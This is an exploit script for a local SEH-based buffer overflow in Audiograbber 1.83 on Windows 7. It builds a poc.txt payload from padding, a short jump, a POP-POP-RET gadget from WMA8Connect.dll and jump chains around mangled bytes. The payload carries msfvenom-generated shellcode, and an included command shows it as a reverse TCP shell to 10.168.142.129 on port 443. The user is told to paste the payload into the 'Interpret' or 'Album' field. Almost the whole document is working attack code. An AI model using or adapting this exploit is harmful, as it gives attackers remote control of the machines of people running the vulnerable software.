# Date: 2018-06-16
# Exploit Author: Dennis 'dhn' Herrmann
# Vendor Homepage: https://www.audiograbber.org/
# Version: 1.83
# Tested on: Windows 7 SP1 (x86)
#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/06/16 13:25:59 dhn Exp $
#
# Tested with Windows 7 SP1 (x86)
# Steps:
# - Paste "poc.txt" content in the "Interpret" or "Album" field
class Exploit:
def __init__(self, shellcode):
self._shellcode = shellcode
self._payload = None
def __write(self):
f = open("poc.txt", "w")
f.write(self._payload)
f.close()
def run(self):
pattern = "A" * 256
jmp_short = "\xeb\x08\x90\x90" # short JMP
pop2ret = "\x79\x91\x01\x10" # WMA8Connect.dll
self._payload = pattern
self._payload += jmp_short
self._payload += pop2ret
# The buffer is mangled so we have to jump
# over the parts to reached our shellcode
self._payload += "\x90" * 18 + jmp_short
self._payload += "\x90" * 28 + jmp_short
self._payload += "\x90" * 32 + self._shellcode
self.__write()
def main():
# msfvenom --platform windows -p windows/shell_reverse_tcp \
# LHOST=10.168.142.129 LPORT=443 -b "\x00\x0a\x0d" \
# -e x86/alpha_mixed -f py
shellcode = (
"\xda\xcd\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51"
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50"
"\x38\x41\x42\x75\x4a\x49\x39\x6c\x59\x78\x6f\x72\x77"
"\x70\x73\x30\x73\x30\x43\x50\x4e\x69\x6b\x55\x55\x61"
"\x69\x50\x32\x44\x6c\x4b\x76\x30\x70\x30\x6e\x6b\x50"
"\x52\x54\x4c\x4c\x4b\x72\x72\x47\x64\x6c\x4b\x74\x32"
"\x46\x48\x36\x6f\x6d\x67\x73\x7a\x67\x56\x74\x71\x6b"
"\x4f\x4e\x4c\x37\x4c\x51\x71\x53\x4c\x53\x32\x34\x6c"
"\x75\x70\x59\x51\x78\x4f\x56\x6d\x73\x31\x79\x57\x6b"
"\x52\x4b\x42\x71\x42\x56\x37\x4c\x4b\x63\x62\x74\x50"
"\x6e\x6b\x52\x6a\x57\x4c\x4c\x4b\x42\x6c\x54\x51\x32"
"\x58\x4d\x33\x37\x38\x57\x71\x58\x51\x76\x31\x4e\x6b"
"\x33\x69\x31\x30\x37\x71\x4e\x33\x6e\x6b\x61\x59\x47"
"\x68\x4a\x43\x47\x4a\x43\x79\x4e\x6b\x76\x54\x6e\x6b"
"\x37\x71\x38\x56\x74\x71\x59\x6f\x4c\x6c\x4b\x71\x78"
"\x4f\x36\x6d\x36\x61\x68\x47\x75\x68\x6b\x50\x70\x75"
"\x39\x66\x55\x53\x31\x6d\x4c\x38\x35\x6b\x73\x4d\x71"
"\x34\x62\x55\x4a\x44\x73\x68\x4c\x4b\x31\x48\x61\x34"
"\x76\x61\x58\x53\x30\x66\x6e\x6b\x76\x6c\x50\x4b\x4e"
"\x6b\x31\x48\x35\x4c\x67\x71\x59\x43\x4c\x4b\x37\x74"
"\x4c\x4b\x53\x31\x4e\x30\x4b\x39\x33\x74\x55\x74\x45"
"\x74\x73\x6b\x43\x6b\x31\x71\x31\x49\x53\x6a\x43\x61"
"\x4b\x4f\x79\x70\x63\x6f\x73\x6f\x70\x5a\x4c\x4b\x64"
"\x52\x5a\x4b\x6c\x4d\x43\x6d\x52\x48\x30\x33\x67\x42"
"\x37\x70\x73\x30\x35\x38\x34\x37\x53\x43\x76\x52\x33"
"\x6f\x53\x64\x63\x58\x30\x4c\x33\x47\x76\x46\x44\x47"
"\x6b\x4f\x38\x55\x6d\x68\x4a\x30\x37\x71\x47\x70\x47"
"\x70\x55\x79\x69\x54\x76\x34\x46\x30\x35\x38\x45\x79"
"\x6d\x50\x70\x6b\x57\x70\x79\x6f\x4a\x75\x56\x30\x56"
"\x30\x30\x50\x46\x30\x73\x70\x30\x50\x43\x70\x72\x70"
"\x62\x48\x4b\x5a\x44\x4f\x59\x4f\x6d\x30\x49\x6f\x7a"
"\x75\x7a\x37\x51\x7a\x55\x55\x53\x58\x76\x6a\x6e\x48"
"\x4c\x4e\x6e\x61\x73\x58\x44\x42\x67\x70\x47\x71\x4f"
"\x4b\x4d\x59\x4d\x36\x53\x5a\x34\x50\x70\x56\x76\x37"
"\x31\x78\x6e\x79\x49\x35\x44\x34\x53\x51\x49\x6f\x68"
"\x55\x6d\x55\x6f\x30\x50\x74\x36\x6c\x69\x6f\x50\x4e"
"\x56\x68\x52\x55\x6a\x4c\x73\x58\x6a\x50\x58\x35\x6c"
"\x62\x46\x36\x59\x6f\x48\x55\x32\x48\x43\x53\x30\x6d"
"\x63\x54\x77\x70\x6f\x79\x78\x63\x56\x37\x32\x77\x46"
"\x37\x50\x31\x59\x66\x32\x4a\x46\x72\x53\x69\x62\x76"
"\x79\x72\x59\x6d\x52\x46\x59\x57\x63\x74\x51\x34\x37"
"\x4c\x76\x61\x66\x61\x6c\x4d\x61\x54\x44\x64\x42\x30"
"\x6b\x76\x73\x30\x42\x64\x63\x64\x52\x70\x31\x46\x51"
"\x46\x50\x56\x42\x66\x30\x56\x62\x6e\x71\x46\x76\x36"
"\x36\x33\x71\x46\x42\x48\x74\x39\x7a\x6c\x55\x6f\x4f"
"\x76\x59\x6f\x6b\x65\x4b\x39\x59\x70\x70\x4e\x66\x36"
"\x30\x46\x59\x6f\x64\x70\x31\x78\x67\x78\x6c\x47\x67"
"\x6d\x35\x30\x49\x6f\x78\x55\x4d\x6b\x58\x70\x6d\x65"
"\x6f\x52\x36\x36\x73\x58\x6c\x66\x7a\x35\x4d\x6d\x6d"
"\x4d\x59\x6f\x59\x45\x75\x6c\x53\x36\x31\x6c\x47\x7a"
"\x6d\x50\x49\x6b\x79\x70\x70\x75\x36\x65\x6f\x4b\x77"
"\x37\x62\x33\x61\x62\x70\x6f\x71\x7a\x45\x50\x61\x43"
"\x6b\x4f\x69\x45\x41\x41"
)
exploit = Exploit(shellcode)
exploit.run()
if __name__ == "__main__":
main()
↧
Audiograbber 1.83 - Local Buffer Overflow (SEH)
↧